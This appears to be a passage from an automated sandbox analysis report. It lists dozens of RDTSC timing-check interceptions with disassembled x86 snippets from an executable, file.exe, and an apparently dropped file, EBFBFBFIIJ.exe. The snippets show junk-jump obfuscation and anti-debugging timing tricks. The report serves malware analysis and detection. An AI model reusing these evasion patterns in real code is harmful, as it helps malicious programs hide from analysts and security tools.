                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8555F second address: F8561A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FBBA93ED29Ch 0x00000010 pop esi 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 pushad 0x00000016 mov di, 5B70h 0x0000001a mov dword ptr [ebp+1244468Ah], edi 0x00000020 popad 0x00000021 pushad 0x00000022 push edx 0x00000023 jmp 00007FBBA93ED2A5h 0x00000028 pop eax 0x00000029 sub dword ptr [ebp+1245B612h], eax 0x0000002f popad 0x00000030 push dword ptr [ebp+1245C03Ah] 0x00000036 mov edx, dword ptr [ebp+125059F8h] 0x0000003c jmp 00007FBBA93ED2A6h 0x00000041 call 00007FBBA93ED299h 0x00000046 push eax 0x00000047 jmp 00007FBBA93ED2A8h 0x0000004c pop eax 0x0000004d push eax 0x0000004e push esi 0x0000004f push ecx 0x00000050 push edi 0x00000051 pop edi 0x00000052 pop ecx 0x00000053 pop esi 0x00000054 mov eax, dword ptr [esp+04h] 0x00000058 jmp 00007FBBA93ED2A8h 0x0000005d mov eax, dword ptr [eax] 0x0000005f push eax 0x00000060 push edx 0x00000061 jl 00007FBBA93ED298h 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88B49 second address: F88B4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B02A9 second address: 54B02BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, C8A2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e movzx eax, dx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B02BA second address: 54B02D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B02D5 second address: 54B02D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B02D9 second address: 54B02EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBBA8502ABCh 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B03E6 second address: 54B03EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B03EA second address: 54B0403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E97392 second address: E9739C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9739C second address: E973AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA8502ABFh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0426 second address: 54B042A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B042A second address: 54B043D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B043D second address: 54B0443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0443 second address: 54B0447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0447 second address: 54B0465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBBA93ED2A3h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0465 second address: 54B048D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0555 second address: 54B057E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBBA93ED29Fh 0x00000009 jmp 00007FBBA93ED2A3h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B057E second address: 54B05BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007FBC19286523h 0x0000000c push 762327D0h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov eax, dword ptr [esp+10h] 0x0000001c mov dword ptr [esp+10h], ebp 0x00000020 lea ebp, dword ptr [esp+10h] 0x00000024 sub esp, eax 0x00000026 push ebx 0x00000027 push esi 0x00000028 push edi 0x00000029 mov eax, dword ptr [762C0140h] 0x0000002e xor dword ptr [ebp-04h], eax 0x00000031 xor eax, ebp 0x00000033 push eax 0x00000034 mov dword ptr [ebp-18h], esp 0x00000037 push dword ptr [ebp-08h] 0x0000003a mov eax, dword ptr [ebp-04h] 0x0000003d mov dword ptr [ebp-04h], FFFFFFFEh 0x00000044 mov dword ptr [ebp-08h], eax 0x00000047 lea eax, dword ptr [ebp-10h] 0x0000004a mov dword ptr fs:[00000000h], eax 0x00000050 ret 0x00000051 jmp 00007FBBA8502AC4h 0x00000056 and dword ptr [ebp-04h], 00000000h 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FBBA8502AC7h 0x00000061 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B05BB second address: 54B05DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBA93ED29Fh 0x00000008 mov ch, FBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edx, dword ptr [ebp+0Ch] 0x00000010 pushad 0x00000011 mov al, dh 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ecx, 3F51C5FFh 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B05DF second address: 54B06C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov esi, edx 0x00000007 pushad 0x00000008 call 00007FBBA8502AC7h 0x0000000d jmp 00007FBBA8502AC8h 0x00000012 pop ecx 0x00000013 mov ax, dx 0x00000016 popad 0x00000017 mov al, byte ptr [edx] 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FBBA8502AC3h 0x00000020 and ecx, 46BCF08Eh 0x00000026 jmp 00007FBBA8502AC9h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007FBBA8502AC0h 0x00000032 adc cl, 00000008h 0x00000035 jmp 00007FBBA8502ABBh 0x0000003a popfd 0x0000003b popad 0x0000003c inc edx 0x0000003d pushad 0x0000003e push ecx 0x0000003f mov bx, D376h 0x00000043 pop edx 0x00000044 mov ebx, eax 0x00000046 popad 0x00000047 test al, al 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FBBA8502ABBh 0x00000052 xor ax, B3FEh 0x00000057 jmp 00007FBBA8502AC9h 0x0000005c popfd 0x0000005d call 00007FBBA8502AC0h 0x00000062 pop esi 0x00000063 popad 0x00000064 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B06C0 second address: 54B06C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FBBA93ED1E1h 0x00000010 mov al, byte ptr [edx] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FBBA93ED2A3h 0x00000019 and ecx, 46BCF08Eh 0x0000001f jmp 00007FBBA93ED2A9h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007FBBA93ED2A0h 0x0000002b adc cl, 00000008h 0x0000002e jmp 00007FBBA93ED29Bh 0x00000033 popfd 0x00000034 popad 0x00000035 inc edx 0x00000036 pushad 0x00000037 push ecx 0x00000038 mov bx, D376h 0x0000003c pop edx 0x0000003d mov ebx, eax 0x0000003f popad 0x00000040 test al, al 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007FBBA93ED29Bh 0x0000004b xor ax, B3FEh 0x00000050 jmp 00007FBBA93ED2A9h 0x00000055 popfd 0x00000056 call 00007FBBA93ED2A0h 0x0000005b pop esi 0x0000005c popad 0x0000005d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0750 second address: 54B0754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0754 second address: 54B0758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0758 second address: 54B075E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B075E second address: 54B0783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edi+01h] 0x0000000c jmp 00007FBBA93ED2A0h 0x00000011 inc edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0783 second address: 54B086A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBBA8502AC3h 0x00000008 add si, F99Eh 0x0000000d jmp 00007FBBA8502AC9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov bx, si 0x00000018 popad 0x00000019 test al, al 0x0000001b jmp 00007FBBA8502ABAh 0x00000020 jne 00007FBC1927AD6Bh 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FBBA8502ABEh 0x0000002d and ax, 92C8h 0x00000032 jmp 00007FBBA8502ABBh 0x00000037 popfd 0x00000038 mov esi, 5B0D603Fh 0x0000003d popad 0x0000003e mov ecx, edx 0x00000040 jmp 00007FBBA8502AC2h 0x00000045 shr ecx, 02h 0x00000048 jmp 00007FBBA8502AC0h 0x0000004d rep movsd 0x0000004f rep movsd 0x00000051 rep movsd 0x00000053 rep movsd 0x00000055 rep movsd 0x00000057 jmp 00007FBBA8502AC0h 0x0000005c mov ecx, edx 0x0000005e pushad 0x0000005f mov edx, eax 0x00000061 mov ebx, ecx 0x00000063 popad 0x00000064 and ecx, 03h 0x00000067 jmp 00007FBBA8502AC4h 0x0000006c rep movsb 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FBBA8502AC7h 0x00000075 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B086A second address: 54B0882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED2A4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0882 second address: 54B0886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0886 second address: 54B08CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000000f jmp 00007FBBA93ED2A7h 0x00000014 mov eax, ebx 0x00000016 jmp 00007FBBA93ED2A6h 0x0000001b mov ecx, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 movsx edi, ax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B08CF second address: 54B08D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B08D4 second address: 54B08E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBBA93ED29Bh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B08E5 second address: 54B0555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr fs:[00000000h], ecx 0x0000000e jmp 00007FBBA8502AC5h 0x00000013 pop ecx 0x00000014 jmp 00007FBBA8502ABEh 0x00000019 pop edi 0x0000001a jmp 00007FBBA8502AC0h 0x0000001f pop esi 0x00000020 jmp 00007FBBA8502AC0h 0x00000025 pop ebx 0x00000026 jmp 00007FBBA8502AC0h 0x0000002b leave 0x0000002c jmp 00007FBBA8502AC0h 0x00000031 retn 0008h 0x00000034 cmp dword ptr [ebp-2Ch], 10h 0x00000038 mov eax, dword ptr [ebp-40h] 0x0000003b jnc 00007FBBA8502AB5h 0x0000003d push eax 0x0000003e lea edx, dword ptr [ebp-00000590h] 0x00000044 push edx 0x00000045 call esi 0x00000047 push 00000008h 0x00000049 jmp 00007FBBA8502AC0h 0x0000004e push 313F523Dh 0x00000053 jmp 00007FBBA8502AC1h 0x00000058 add dword ptr [esp], 44EAC9EBh 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 pushfd 0x00000063 jmp 00007FBBA8502AC3h 0x00000068 or eax, 6603AE3Eh 0x0000006e jmp 00007FBBA8502AC9h 0x00000073 popfd 0x00000074 pushfd 0x00000075 jmp 00007FBBA8502AC0h 0x0000007a xor si, 7338h 0x0000007f jmp 00007FBBA8502ABBh 0x00000084 popfd 0x00000085 popad 0x00000086 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: F3F1DE second address: F3F1E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: F3F1E3 second address: F3EA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FBBA8502ABFh 0x0000000d nop 0x0000000e pushad 0x0000000f mov edx, 143E71B3h 0x00000014 mov cx, 2000h 0x00000018 popad 0x00000019 push dword ptr [ebp+122D00E9h] 0x0000001f jg 00007FBBA8502AC2h 0x00000025 call dword ptr [ebp+122D2AC5h] 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D2AD5h], esi 0x00000032 xor eax, eax 0x00000034 pushad 0x00000035 sub esi, dword ptr [ebp+122D365Bh] 0x0000003b push edx 0x0000003c pop edx 0x0000003d popad 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 jmp 00007FBBA8502AC9h 0x00000047 mov dword ptr [ebp+122D388Fh], eax 0x0000004d jns 00007FBBA8502ACBh 0x00000053 jne 00007FBBA8502ABCh 0x00000059 mov esi, 0000003Ch 0x0000005e jne 00007FBBA8502AB7h 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 jmp 00007FBBA8502ABFh 0x0000006d lodsw 0x0000006f js 00007FBBA8502ABCh 0x00000075 mov dword ptr [ebp+122D2A0Bh], edx 0x0000007b clc 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 pushad 0x00000081 movsx esi, dx 0x00000084 and bl, FFFFFFA5h 0x00000087 popad 0x00000088 mov ebx, dword ptr [esp+24h] 0x0000008c sub dword ptr [ebp+122D2AD5h], edx 0x00000092 nop 0x00000093 pushad 0x00000094 push eax 0x00000095 push edx 0x00000096 jnp 00007FBBA8502AB6h 0x0000009c rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: F3EA22 second address: F3EA40 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FBBA93ED298h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FBBA93ED296h 0x0000001c rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: F3EA40 second address: F3EA4A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: F3EA4A second address: F3EA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10B84C6 second address: 10B84CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10B8633 second address: 10B864E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBA93ED2A2h 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10B8A4F second address: 10B8A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10B8BB3 second address: 10B8BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBBA93ED2A1h 0x00000010 jmp 00007FBBA93ED29Fh 0x00000015 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BC87C second address: 10BC880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BC880 second address: F3EA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 xor dword ptr [esp], 1F24A741h 0x0000000e movsx edx, si 0x00000011 push dword ptr [ebp+122D00E9h] 0x00000017 mov dword ptr [ebp+122D2A0Bh], edx 0x0000001d call dword ptr [ebp+122D2AC5h] 0x00000023 pushad 0x00000024 mov dword ptr [ebp+122D2AD5h], esi 0x0000002a xor eax, eax 0x0000002c pushad 0x0000002d sub esi, dword ptr [ebp+122D365Bh] 0x00000033 push edx 0x00000034 pop edx 0x00000035 popad 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007FBBA93ED2A9h 0x0000003f mov dword ptr [ebp+122D388Fh], eax 0x00000045 jns 00007FBBA93ED2ABh 0x0000004b jmp 00007FBBA93ED2A5h 0x00000050 jne 00007FBBA93ED29Ch 0x00000056 mov esi, 0000003Ch 0x0000005b jne 00007FBBA93ED297h 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 jmp 00007FBBA93ED29Fh 0x0000006a lodsw 0x0000006c js 00007FBBA93ED29Ch 0x00000072 mov dword ptr [ebp+122D2A0Bh], edx 0x00000078 clc 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d pushad 0x0000007e movsx esi, dx 0x00000081 and bl, FFFFFFA5h 0x00000084 popad 0x00000085 mov ebx, dword ptr [esp+24h] 0x00000089 sub dword ptr [ebp+122D2AD5h], edx 0x0000008f nop 0x00000090 pushad 0x00000091 push eax 0x00000092 push edx 0x00000093 jnp 00007FBBA93ED296h 0x00000099 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BC8CE second address: 10BC9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 clc 0x00000009 push 00000000h 0x0000000b call 00007FBBA8502AC7h 0x00000010 mov dword ptr [ebp+122D1EA3h], edi 0x00000016 pop edi 0x00000017 push C75E4B23h 0x0000001c jmp 00007FBBA8502AC6h 0x00000021 add dword ptr [esp], 38A1B55Dh 0x00000028 jmp 00007FBBA8502AC8h 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007FBBA8502AB8h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 push ebx 0x0000004a mov esi, dword ptr [ebp+122D3867h] 0x00000050 pop edi 0x00000051 mov dword ptr [ebp+12450679h], esi 0x00000057 push 00000000h 0x00000059 mov dx, 6D26h 0x0000005d push 00000003h 0x0000005f call 00007FBBA8502AC1h 0x00000064 call 00007FBBA8502AC9h 0x00000069 pop esi 0x0000006a pop edx 0x0000006b call 00007FBBA8502AB9h 0x00000070 pushad 0x00000071 jmp 00007FBBA8502AC0h 0x00000076 push esi 0x00000077 push eax 0x00000078 pop eax 0x00000079 pop esi 0x0000007a popad 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007FBBA8502ABAh 0x00000083 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BC9C0 second address: 10BCA54 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jmp 00007FBBA93ED2A8h 0x00000012 push ebx 0x00000013 ja 00007FBBA93ED296h 0x00000019 pop ebx 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d push edx 0x0000001e pushad 0x0000001f push edi 0x00000020 pop edi 0x00000021 jnl 00007FBBA93ED296h 0x00000027 popad 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d pushad 0x0000002e jl 00007FBBA93ED298h 0x00000034 pushad 0x00000035 popad 0x00000036 pushad 0x00000037 jmp 00007FBBA93ED2A6h 0x0000003c jnp 00007FBBA93ED296h 0x00000042 popad 0x00000043 popad 0x00000044 pop eax 0x00000045 jmp 00007FBBA93ED29Ch 0x0000004a lea ebx, dword ptr [ebp+124517B8h] 0x00000050 jmp 00007FBBA93ED2A4h 0x00000055 xchg eax, ebx 0x00000056 push ecx 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BCA54 second address: 10BCA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BCA5A second address: 10BCA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FBBA93ED2A6h 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BCBC1 second address: 10BCBE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 15DDDFBAh 0x00000011 mov esi, 62EB0B68h 0x00000016 lea ebx, dword ptr [ebp+124517C1h] 0x0000001c movzx esi, di 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pushad 0x00000024 popad 0x00000025 pop ebx 0x00000026 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BCBE7 second address: 10BCBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BCBED second address: 10BCBF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BCBF1 second address: 10BCC06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a js 00007FBBA93ED298h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DC85C second address: 10DC888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBBA8502ABFh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBBA8502AC0h 0x00000011 je 00007FBBA8502AB6h 0x00000017 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DA892 second address: 10DA8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED2A5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBBA93ED29Eh 0x00000011 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DA8BC second address: 10DA8C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DA8C2 second address: 10DA8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBBA93ED2A5h 0x0000000e rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB008 second address: 10DB00E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB314 second address: 10DB318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
